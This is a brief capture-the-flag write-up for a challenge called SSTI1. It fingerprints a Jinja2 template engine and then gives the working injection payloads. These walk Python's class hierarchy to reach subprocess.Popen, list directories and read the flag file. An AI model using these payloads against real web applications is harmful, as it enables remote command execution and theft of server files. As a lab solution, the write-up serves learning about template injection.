Skip to content

SSTI1

Server Side Template Injection

Identify template engine by payload {{7*'7'}} \ It's Jinja2

Explore Jinja2 SSTI payloads

{{ ''.__class__.__mro__[1].__subclasses__() }} -> lists all subclasses, which has <class 'subprocess.Popen'> at index 356 \ {{ ''.__class__.__mro__[1].__subclasses__()[356]('ls /', shell=True, stdout=-1).communicate() }} -> lists contents of root directory; challenge looks interesting \ {{ ''.__class__.__mro__[1].__subclasses__()[356]('ls /challenge/', shell=True, stdout=-1).communicate() }} -> lists contents of directory of the web app; flag spotted! \ {{ ''.__class__.__mro__[1].__subclasses__()[356]('cat /challenge/flag', shell=True, stdout=-1).communicate() }} -> done!